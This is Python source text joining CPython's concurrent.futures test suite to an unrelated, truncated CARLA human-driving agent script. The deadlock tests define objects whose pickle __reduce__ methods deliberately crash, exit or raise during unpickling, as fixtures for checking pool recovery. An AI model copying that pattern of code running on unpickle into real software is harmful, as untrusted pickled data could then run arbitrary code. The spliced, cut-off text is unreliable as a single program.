class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
queue_management_thread = executor._queue_management_thread
del executor
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
create_executor_tests(AsCompletedTests)
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertWarns(DeprecationWarning):
future = self.executor.submit(fn=capture, arg=1)
self.assertEqual(future.result(), ((), {'arg': 1}))
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ExecutorTest):
@unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
def test_ressources_gced_in_workers(self):
# Ensure that argument for a job are correctly gc-ed after the job
# is finished
obj = EventfulGCObj(self.ctx)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def hide_process_stderr():
import io
sys.stderr = io.StringIO()
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
hide_process_stderr()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
hide_process_stderr()
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = 15
@classmethod
def _sleep_id(cls, x, delay):
time.sleep(delay)
return x
def _fail_on_deadlock(self, executor):
# If we did not recover before TIMEOUT seconds, consider that the
# executor is in a deadlock state and forcefully clean all its
# composants.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
# This should be safe to call executor.shutdown here as all possible
# deadlocks should have been broken.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def test_crash(self):
# extensive testing for deadlock caused by crashes in a pool.
self.executor.shutdown(wait=True)
crash_cases = [
# Check problem occurring while pickling a task in
# the task_handler thread
(id, (ErrorAtPickle(),), PicklingError, "error at task pickle"),
# Check problem occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool,
"exit at task unpickle"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool,
"error at task unpickle"),
(id, (CrashAtUnpickle(),), BrokenProcessPool,
"crash at task unpickle"),
# Check problem occurring during func execution on workers
(_crash, (), BrokenProcessPool,
"crash during func execution on worker"),
(_exit, (), SystemExit,
"exit during func execution on worker"),
(_raise_error, (RuntimeError, ), RuntimeError,
"error during func execution on worker"),
# Check problem occurring while pickling a task result
# on workers
(_return_instance, (CrashAtPickle,), BrokenProcessPool,
"crash during result pickle on worker"),
(_return_instance, (ExitAtPickle,), SystemExit,
"exit during result pickle on worker"),
(_return_instance, (ErrorAtPickle,), PicklingError,
"error during result pickle on worker"),
# Check problem occurring while unpickling a task in
# the result_handler thread
(_return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
"error during result unpickle in result_handler"),
(_return_instance, (ExitAtUnpickle,), BrokenProcessPool,
"exit during result unpickle in result_handler")
]
for func, args, error, name in crash_cases:
with self.subTest(name):
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
executor = self.executor_type(
max_workers=2, mp_context=get_context(self.ctx))
res = executor.submit(func, *args)
with self.assertRaises(error):
try:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_shutdown_deadlock(self):
# Test that the pool calling shutdown do not cause deadlock
# if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=get_context(self.ctx)) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with test.support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
HumanAgent.py
|
import cv2
import numpy as np
import time
from threading import Thread
try:
import pygame
from pygame.locals import K_BACKSPACE
from pygame.locals import K_COMMA
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_LEFT
from pygame.locals import K_PERIOD
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_TAB
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_c
from pygame.locals import K_d
from pygame.locals import K_h
from pygame.locals import K_m
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_w
from pygame.locals import K_MINUS
from pygame.locals import K_EQUALS
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
import carla
from srunner.challenge.autoagents.autonomous_agent import AutonomousAgent, Track
class HumanInterface():
"""
Class to control a vehicle manually for debugging purposes
"""
def __init__(self, parent):
self.quit = False
self._parent = parent
self.WIDTH = 800
self.HEIGHT = 600
self.THROTTLE_DELTA = 0.05
self.STEERING_DELTA = 0.01
pygame.init()
pygame.font.init()
self._clock = pygame.time.Clock()
self._display = pygame.display.set_mode((self.WIDTH, self.HEIGHT), pygame.HWSURFACE | pygame.DOUBLEBUF)
pygame.display.set_caption("Human Agent")
def run(self):
while not self._parent.agent_engaged and not self.quit:
time.sleep(0.5)
controller = KeyboardControl()
while not self.quit:
self._clock.tick_busy_loop(20)
controller.parse_events(self._parent.current_control, self._clock)
# Process events
pygame.event.pump()
# process sensor data
# parent <=> agent
input_data = self._parent.sensor_interface.get_data()
image_center = input_data['Center'][1][:,:,-2::-1]
image_left = input_data['Left'][1][:,:,-2::-1]
image_right = input_data['Right'][1][:,:,-2::-1]
image_rear = input_data['Rear'][1][:,:,-2::-1]
top_row = np.hstack((image_left, image_center, image_right))
bottom_row = np.hstack((0*image_rear, image_rear, 0*image_rear))
comp_image = np.vstack((top_row, bottom_row))
# resize image
image_rescaled = cv2.resize(comp_image, dsize=(self.WIDTH, self.HEIGHT), interpolation=cv2.INTER_CUBIC)
# display image
self._surface = pygame.surfarray.make_surface(image_rescaled.swapaxes(0, 1))
if self._surface is not None:
self._display.blit(self._surface, (0, 0))
pygame.display.flip()
pygame.quit()
class HumanAgent(AutonomousAgent):
def setup(self, path_to_conf_file):
self.track = Track.ALL_SENSORS_HDMAP_WAYPOINTS
self.agent_engaged = False
self.current_control = carla.VehicleControl()
self.current_control.steer = 0.0
self.current_control.throttle = 1.0
self.current_control.brake = 0.0
self.current_control.hand_brake = False
self._hic = HumanInterface(self)
self._thread = Thread(target=self._hic.run)
self._thread.start()
def sensors(self):
"""
Define the sensor suite required by the agent
:return: a list containing the required sensors in the following format:
[
['sensor.camera.rgb', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll,
'width': width, 'height': height, 'fov': fov}, 'Sensor01'],
['sensor.camera.rgb', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll,
'width': width, 'height': height, 'fov': fov}, 'Sensor02'],
['sensor.lidar.ray_cast', {'x':x_rel, 'y': y_rel, 'z': z_rel,
'yaw': yaw, 'pitch': pitch, 'roll': roll}, 'Sensor03']
]
"""
sensors = [{'type': 'sensor.camera.rgb', 'x':0.7, 'y':0.0, 'z':1.60, 'roll':0.0, 'pitch':0.0, 'yaw':0.0,
'width':300, 'height':200, 'fov':100, 'id': 'Center'},
{'type': 'sensor.camera.rgb', 'x':0.7, 'y':-0.4, 'z': 1.60, 'roll': 0.0, 'pitch': 0.0,
